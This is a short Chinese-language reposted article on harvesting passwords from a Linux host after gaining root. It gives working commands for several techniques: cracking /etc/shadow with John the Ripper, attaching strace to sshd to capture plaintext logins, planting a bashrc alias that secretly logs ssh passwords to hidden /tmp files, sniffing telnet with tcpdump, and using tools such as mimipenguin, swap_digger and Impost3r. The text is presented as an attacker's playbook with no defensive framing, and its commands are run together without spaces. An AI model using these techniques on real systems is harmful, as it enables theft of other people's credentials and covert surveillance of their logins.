本文转载自微信公众号《绕过》,作者绕过。转载本文请联系旁路公众号。在获得对主机的root访问权限时,我们总是想方设法通过收集各种密码凭据来继续扩展结果。Linux下的环境相对比较纯净,介绍了几种常用的技术和工具。关键词:凭据盗窃、密码收集、密码抓取、密码嗅探01、历史记录敏感操作Linux系统会自动将用户的操作命令记录到历史列表中,当用户在命令行输入账号和密码登录时,会导致敏感信息的泄露。02.Shadow文件破解Shadow用于Linux系统中存放用户的密码信息。举例说明:root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::密码域密文由三部分组成,即:$idsalt$encrypted。当id=1时,使用md5加密,弱口令容易被破解。当id为5时,使用SHA256加密,当id为6时,使用SHA512加密,可以被john暴力破解。wgethttps://www.openwall.com/john/k/john-1.9.0.tar.gztar-zxvfjohn-1.9.0.tar.gzmakecleanlinux-x86-64./john/etc/shadow03,mimipenguin抓取密码一这个Linux下的密码抓取神器需要root权限才能运行。通过转储进程并提取可能包含明文密码的行,它使用内存中的明文凭据。目前支持Kali、Ubnutu等操作系统。Github地址:https://github.com/huntergregal/mimipenguin04,使用Strace收集登录凭据strace是一个动态跟踪工具,堪比键盘记录器的存在,可以用来收集登录凭据。(1)获取sshd进程的明文密码(strace-f-F-p`psaux|grep"sshd-D"|grep-vgrep|awk{'print$2'}`-t-etrace=read,write-s322>/tmp/.sshd.log&)用于匹配用户和密码#查找用户名和密码grep-E'read\(6,".+\\0\\0\\0\\.+"'/tmp/.sshd.log#结果格式为[pid2401]22:34:34read(6,"\10\0\0\0\4root",9)=9[pid2401]22:34:34read(6,"\4\0\0\0\16ssh连接\0\0\0\0\0\0\0\0",27)=27[pid2401]22:34:34read(6,"\f\0\0\0\4toor",9)=9(2)收集ssh登录凭证#添加命令别名vi~/.bashrc或/etc/bashrcaliasssh='strace-f-etrace=read,write-o/tmp/.ssh-`date'+%d%h%m%s'`.log-s32ssh'#让命令别名立即生效source~/.bashrc通过grep找到匹配行的最后8行,可以调整个数oflines根据密码的长度grep-A9'password'.ssh-25Sep091601017212.log05,tcpdump抓包分析抓取数据包进行分析,获取明文账号密码,如ftp,telnet,http.tcpdump-iens33port23-wtest.cap06,全盘搜索敏感信息全局搜索配置文件、脚本、数据库、日志文件是否包含密码。grep-rn"password="/07,swap_digger用于自动Linux交换分析、自动交换提取和搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基础身份验证、WiFiSSID和密钥等的bash脚本。github项目地址:https://github.com/sevagas/swap_digger08,Impost3r是一款用C语言编写的linux下各种密码(ssh、su、sudo)窃取工具。github项目地址:https://github.com/ph4ntonn/Impost3r